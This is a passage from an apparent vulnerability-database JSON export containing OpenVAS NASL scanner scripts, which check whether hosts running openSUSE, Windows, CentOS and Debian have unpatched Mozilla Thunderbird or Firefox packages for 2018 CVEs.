\"CVE-2018-5162\", \"CVE-2018-5168\", \"CVE-2018-5170\",\n \"CVE-2018-5174\", \"CVE-2018-5178\", \"CVE-2018-5183\", \"CVE-2018-5184\",\n \"CVE-2018-5185\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for Mozilla (openSUSE-SU-2018:1361-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Mozilla'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for Mozilla Thunderbird to version 52.8 fixes the following\n issues:\n\n Security issues fixed (MFSA 2018-13, boo#1092548):\n\n - CVE-2018-5183: Backport critical security fixes in Skia\n\n - CVE-2018-5154: Use-after-free with SVG animations and clip paths\n\n - CVE-2018-5155: Use-after-free with SVG animations and text paths\n\n - CVE-2018-5159: Integer overflow and out-of-bounds write in Skia\n\n - CVE-2018-5168: Lightweight themes can be installed without user\n interaction\n\n - CVE-2018-5178: Buffer overflow during UTF-8 to Unicode string conversion\n through legacy extension\n\n - CVE-2018-5150: Memory safety bugs fixed in Firefox 60, Firefox ESR 52.8,\n and Thunderbird 52.8\n\n - CVE-2018-5161: Hang via malformed headers (bsc#1093970)\n\n - CVE-2018-5162: Encrypted mail leaks plaintext through src attribute\n (bsc#1093971)\n\n - CVE-2018-5170: Filename spoofing for external attachments (bsc#1093972)\n\n - CVE-2018-5184: Full plaintext recovery in S/MIME via chosen-ciphertext\n attack (bsc#1093969)\n\n - CVE-2018-5185: Leaking plaintext through HTML forms (bsc#1093973)\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2018-486=1\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2018-486=1\");\n\n script_tag(name:\"affected\", value:\"Mozilla on openSUSE Leap 42.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:1361-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-05/msg00089.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird\", rpm:\"MozillaThunderbird~52.8~63.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird-buildsymbols\", rpm:\"MozillaThunderbird-buildsymbols~52.8~63.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird-debuginfo\", rpm:\"MozillaThunderbird-debuginfo~52.8~63.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird-debugsource\", rpm:\"MozillaThunderbird-debugsource~52.8~63.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird-devel\", rpm:\"MozillaThunderbird-devel~52.8~63.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird-translations-common\", rpm:\"MozillaThunderbird-translations-common~52.8~63.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird-translations-other\", rpm:\"MozillaThunderbird-translations-other~52.8~63.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5155", "CVE-2018-5170", "CVE-2018-5183", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-5174", "CVE-2018-5168", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5159"], "description": "This host is installed with Mozilla\n Thunderbird and is prone to multiple vulnerabilities.", "modified": "2019-05-17T00:00:00", "published": "2018-05-22T00:00:00", "id": "OPENVAS:1361412562310812892", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812892", "type": "openvas", "title": "Mozilla Thunderbird Security Updates(mfsa_2018-05_2018-13)-Windows", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mozilla Thunderbird Security Updates(mfsa_2018-05_2018-13)-Windows\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mozilla:thunderbird\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812892\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-5183\", \"CVE-2018-5184\", \"CVE-2018-5154\", \"CVE-2018-5155\",\n \"CVE-2018-5159\", \"CVE-2018-5161\", \"CVE-2018-5162\", \"CVE-2018-5170\",\n \"CVE-2018-5168\", \"CVE-2018-5174\", \"CVE-2018-5178\", \"CVE-2018-5185\",\n \"CVE-2018-5150\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-22 11:26:11 +0530 (Tue, 22 May 2018)\");\n script_name(\"Mozilla Thunderbird Security Updates(mfsa_2018-05_2018-13)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Mozilla\n Thunderbird and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Flaw exist due to,\n\n - Momory corruption issues in Skia library.\n\n - Remote content in encrypted messages.\n\n - While enumerating attributes during SVG animations with clip paths.\n\n - While adjusting layout during SVG animations with text paths.\n\n - 32-bit integer use in an array without integer overflow checks in Skia\n library.\n\n - Crafted message headers.\n\n - src attribute of remote images, or links.\n\n - Possibility to spoof the filename of an attachment and display an arbitrary\n attachment name.\n\n - Manipulation of the baseURI property of the theme element.\n\n - Firefox incorrectly setting SEE_MASK_FLAG_NO_UI flag.\n\n - UTF8 to Unicode string conversion within JavaScript with extremely large\n amounts of data.\n\n - User submitting an embedded form.\n\n - Memory corruption issue in Thunderbird 52.7.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this\n vulnerability will allow remote attackers to reads and writes invalid buffer,\n disclosure of plaintext, use-after-free vulnerability, integer overflow,\n hang on receiving the message, user opening a remote attachment which is a\n different file type than expected, allow a malicious site to install a theme\n without user interaction, allow an unknown and potentially dangerous file to\n run, buffer overflow and run arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Thunderbird version before\n 52.8 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Thunderbird version 52.8\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2018-13/\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2018-09/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_thunderbird_detect_portable_win.nasl\");\n script_mandatory_keys(\"Thunderbird/Win/Ver\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/thunderbird\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\ntbVer = infos['version'];\ntbPath = infos['location'];\n\nif(version_is_less(version:tbVer, test_version:\"52.8\"))\n{\n report = report_fixed_ver(installed_version:tbVer, fixed_version:\"52.8\", install_path:tbPath);\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5155", "CVE-2018-5183", "CVE-2018-5157", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5158", "CVE-2018-5159"], "description": "Check the version of firefox", "modified": "2019-03-08T00:00:00", "published": "2018-06-05T00:00:00", "id": "OPENVAS:1361412562310882905", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882905", "type": "openvas", "title": "CentOS Update for firefox CESA-2018:1415 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_CESA-2018_1415_firefox_centos7.nasl 14058 2019-03-08 13:25:52Z cfischer $\n#\n# CentOS Update for firefox CESA-2018:1415 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882905\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-05 14:03:20 +0530 (Tue, 05 Jun 2018)\");\n script_cve_id(\"CVE-2018-5150\", \"CVE-2018-5154\", \"CVE-2018-5155\", \"CVE-2018-5157\",\n \"CVE-2018-5158\", \"CVE-2018-5159\", \"CVE-2018-5168\", \"CVE-2018-5178\",\n \"CVE-2018-5183\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for firefox CESA-2018:1415 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of firefox\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mozilla Firefox is an open-source web browser, designed for standards\ncompliance, performance, and portability.\n\nThis update upgrades Firefox to version 52.8.0 ESR.\n\nSecurity Fix(es):\n\n * Mozilla: Memory safety bugs fixed in Firefox 60 and Firefox ESR 52.8\n(CVE-2018-5150)\n\n * Mozilla: Backport critical security fixes in Skia (CVE-2018-5183)\n\n * Mozilla: Use-after-free with SVG animations and clip paths\n(CVE-2018-5154)\n\n * Mozilla: Use-after-free with SVG animations and text paths\n(CVE-2018-5155)\n\n * Mozilla: Same-origin bypass of PDF Viewer to view protected PDF files\n(CVE-2018-5157)\n\n * Mozilla: Malicious PDF can inject JavaScript into PDF Viewer\n(CVE-2018-5158)\n\n * Mozilla: Integer overflow and out-of-bounds write in Skia (CVE-2018-5159)\n\n * Mozilla: Lightweight themes can be installed without user interaction\n(CVE-2018-5168)\n\n * Mozilla: Buffer overflow during UTF-8 to Unicode string conversion\nthrough legacy extension (CVE-2018-5178)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section.\n\nRed Hat would like to thank the Mozilla project for reporting these issues.\nUpstream acknowledges Christoph Diehl, Randell Jesup, Tyson Smith, Alex\nGaynor, Ronald Crane, Julian Hector, Kannan Vijayan, Jason Kratzer, Mozilla\nDevelopers, Nils, Wladimir Palant, Ivan Fratric, and Root Object as the\noriginal reporters.\");\n script_tag(name:\"affected\", value:\"firefox on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"CESA\", value:\"2018:1415\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2018-May/022859.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~52.8.0~1.el7.centos\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-29T20:10:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5155", "CVE-2018-5183", "CVE-2018-5157", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5158", "CVE-2018-5159"], "description": "Several security issues have been found in the Mozilla Firefox web\nbrowser: Multiple memory safety errors and other implementation errors\nmay lead to the execution of arbitrary code or denial of service.", "modified": "2020-01-29T00:00:00", "published": "2018-05-14T00:00:00", "id": "OPENVAS:1361412562310891376", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891376", "type": "openvas", "title": "Debian LTS: Security Advisory for firefox-esr (DLA-1376-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891376\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2018-5150\", \"CVE-2018-5154\", \"CVE-2018-5155\", \"CVE-2018-5157\", \"CVE-2018-5158\",\n \"CVE-2018-5159\", \"CVE-2018-5168\", \"CVE-2018-5178\", \"CVE-2018-5183\");\n script_name(\"Debian LTS: Security Advisory for firefox-esr (DLA-1376-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-05-14 00:00:00 +0200 (Mon, 14 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/05/msg00007.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"firefox-esr on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n52.8.0esr-1~deb7u1.\n\nWe recommend that you upgrade your firefox-esr packages.\");\n\n script_tag(name:\"summary\", value:\"Several security issues have been found in the Mozilla Firefox web\nbrowser: Multiple memory safety errors and other implementation errors\nmay lead to the execution of arbitrary code or denial of service.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-dbg\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-dev\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ach\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-af\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-all\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-an\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ar\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-as\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ast\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-az\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bg\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bn-bd\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bn-in\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-br\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bs\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ca\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-cak\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-cs\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-cy\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-da\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-de\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-dsb\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-el\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-en-gb\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-en-za\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-eo\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-ar\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-cl\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-es\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-mx\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-et\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-eu\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fa\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ff\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fi\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fr\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fy-nl\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ga-ie\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gd\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gl\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gn\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gu-in\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-he\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hi-in\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hr\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hsb\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hu\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hy-am\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-id\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-is\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-it\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ja\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ka\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-kab\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-kk\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-km\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-kn\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ko\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-lij\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-lt\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-lv\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-mai\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-mk\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ml\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-mr\", ver:\"52.8.0esr-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = 